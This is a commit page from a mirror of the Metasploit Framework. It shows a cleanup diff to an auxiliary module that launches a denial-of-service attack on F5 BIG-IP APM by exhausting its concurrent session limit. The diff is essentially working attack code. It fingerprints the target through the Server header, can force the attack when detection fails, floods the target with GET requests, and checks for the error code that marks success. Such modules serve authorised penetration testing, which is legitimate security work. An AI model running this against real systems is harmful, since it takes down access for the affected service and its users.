infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do code cleanup

bug/bundler_fix
jvazquez-r7 2015-05-08 13:33:28 -05:00
parent 60c2c7a7cd
commit 7e62ba85a1
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 21 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb
View File

@ -50,52 +50,46 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
# Main function limit = datastore['RLIMIT']
rlimit = datastore['RLIMIT']
force_attack = datastore['FORCE'] force_attack = datastore['FORCE']
# Send an initial test request
res = send_request_cgi('method' => 'GET', 'uri' => '/') res = send_request_cgi('method' => 'GET', 'uri' => '/')
if res
server = res.headers['Server'] unless res
# Simple test based on HTTP Server header to detect BigIP virtual server print_error("#{peer} - No answer from the BigIP server")
unless force_attack
if server !~ /BIG\-IP/ && server !~ /BigIP/
print_error("#{peer} - BigIP virtual server was not detected. Please check options")
return
end
end
print_good("#{peer} - Starting DoS attack")
else
print_error("#{peer} - Unable to connect to BigIP. Please check options")
return return
end end
# Simple test based on HTTP Server header to detect BigIP virtual server
server = res.headers['Server']
unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack
print_error("#{peer} - BigIP virtual server was not detected. Please check options")
return
end
print_status("#{peer} - Starting DoS attack")
# Start attack # Start attack
(1..rlimit).each do limit.times do
res = send_request_cgi('method' => 'GET', 'uri' => '/') res = send_request_cgi('method' => 'GET', 'uri' => '/')
if res && res.headers['Location'] == '/my.logout.php3?errorcode=14' if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/
print_good("#{peer} - The maximum number of concurrent user sessions has been reached. No new user sessions can start at this time") print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.")
print_good("#{peer} - DoS attack is successful")
return return
end end
end end
# Check if attack is unsuccessfull # Check if attack has failed
res = send_request_cgi('method' => 'GET', 'uri' => uri) res = send_request_cgi('method' => 'GET', 'uri' => uri)
if res.headers['Location'] == '/my.policy' if res.headers['Location'] =~ /\/my.policy/
print_status("#{peer} - DoS attack is unsuccessful. Try to increase the RLIMIT number") print_error("#{peer} - DoS attack failed. Try to increase the RLIMIT")
else else
print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result") print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result")
end end
rescue ::Rex::ConnectionRefused rescue ::Rex::ConnectionRefused
print_error("#{peer} - Unable to connect to BigIP") print_error("#{peer} - Unable to connect to BigIP. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
rescue ::Rex::ConnectionTimeout rescue ::Rex::ConnectionTimeout
print_error("#{peer} - Unable to connect to BigIP. Please check options") print_error("#{peer} - Unable to connect to BigIP.")
rescue ::Errno::ECONNRESET
print_error("#{peer} - The connection was reset. Probably BigIP \"Max In Progress Sessions Per Client IP\" counter was reached")
print_status("#{peer} - DoS attack is unsuccessful")
rescue ::OpenSSL::SSL::SSLError rescue ::OpenSSL::SSL::SSLError
print_error("#{peer} - SSL/TLS connection error") print_error("#{peer} - SSL/TLS connection error")
end end